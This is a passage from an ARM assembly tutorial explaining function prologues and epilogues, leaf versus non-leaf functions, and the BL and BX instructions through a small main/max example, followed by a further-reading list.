    pop    {r11, pc}    /* End of the epilogue. Restoring Frame Pointer from the Stack, jumping to previously saved LR via direct load into PC. The Stack Frame of a function is finally destroyed at this step. */

    So now we know, that:

    1. Prologue sets up the environment for the function;
    2. Body implements the function’s logic and stores result to R0;
    3. Epilogue restores the state so that the program can resume from where it left of before calling the function.

    Another key point to know about the functions is their types: leaf and non-leaf. The leaf function is a kind of a function which does not call/branch to another function from itself. A non-leaf function is a kind of a function which in addition to it’s own logic’s does call/branch to another function. The implementation of these two kind of functions are similar. However, they have some differences. To analyze the differences of these functions we will use the following piece of code:

    /* azeria@labs:~$ as func.s -o func.o && gcc func.o -o func && gdb func */
    .global main
    
    main:
    	push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    	mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    	mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    	bl     max          /* Calling/branching to function max */
    	sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */
    
    max:
    	push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */
    	cmp    r0, r1       /* Implementation of if(a<b) */
    	movlt  r0, r1       /* if r0 was lower than r1, store r1 into r0 */
    	add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11}        /* restoring frame pointer */
    	bx     lr           /* End of the epilogue. Jumping back to main via LR register */

    The example above contains two functions: main, which is a non-leaf function, and max – a leaf function. As mentioned before, the non-leaf function calls/branches to another function, which is true in our case, because we branch to a function max from the function main. The function max in this case does not branch to another function within it’s body part, which makes it a leaf function.

    Another key difference is the way the prologues and epilogues are implemented. The following example shows a comparison of prologues of a non-leaf and leaf functions:

    /* A prologue of a non-leaf function */
    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    
    /* A prologue of a leaf function */
    push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */

    The main difference here is that the entry of the prologue in the non-leaf function saves more register’s onto the stack. The reason behind this is that by the nature of the non-leaf function, the LR gets modified during the execution of such a function and therefore the value of this register needs to be preserved so that it can be restored later. Generally, the prologue could save even more registers if it’s necessary.

    The comparison of the epilogues of the leaf and non-leaf functions, which we see below, shows us that the program’s flow is controlled in different ways: by branching to an address stored in the LR register in the leaf function’s case and by direct POP to PC register in the non-leaf function.

     /* An epilogue of a leaf function */
    add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11}        /* restoring frame pointer */
    bx     lr           /* End of the epilogue. Jumping back to main via LR register */
    
    /* An epilogue of a non-leaf function */
    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

    Finally, it is important to understand the use of BL and BX instructions here. In our example, we branched to a leaf function by using a BL instruction. We use the the label of a function as a parameter to initiate branching. During the compilation process, the label gets replaced with a memory address. Before jumping to that location, the address of the next instruction is saved (linked) to the LR register so that we can return back to where we left off when the function max is finished.

    The BX instruction, which is used to leave the leaf function, takes LR register as a parameter. As mentioned earlier, before jumping to function max the BL instruction saved the address of the next instruction of the function main into the LR register. Due to the fact that the leaf function is not supposed to change the value of the LR register during it’s execution, this register can be now used to return to the parent (main) function. As explained in the previous chapter, the BX instruction  can eXchange between the ARM/Thumb modes during branching operation. In this case, it is done by inspecting the last bit of the LR register: if the bit is set to 1, the CPU will change (or keep) the mode to thumb, if it’s set to 0, the mode will be changed (or kept) to ARM. This is a nice design feature which allows to call functions from different modes.

    To take another perspective into functions and their internals we can examine the following animation which illustrates the inner workings of non-leaf and leaf functions.

FURTHER READING

1. Whirlwind Tour of ARM Assembly.
https://www.coranac.com/tonc/text/asm.htm

2. ARM assembler in Raspberry Pi.
http://thinkingeek.com/arm-assembler-raspberry-pi/

3. Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation by Bruce Dang, Alexandre Gazet, Elias Bachaalany and Sebastien Josse.

4. ARM Reference Manual.
http://infocenter.arm.com/help/topic/com.arm.doc.dui0068b/index.html

5. Assembler User Guide.
http://www.keil.com/support/man/docs/armasm/default.htm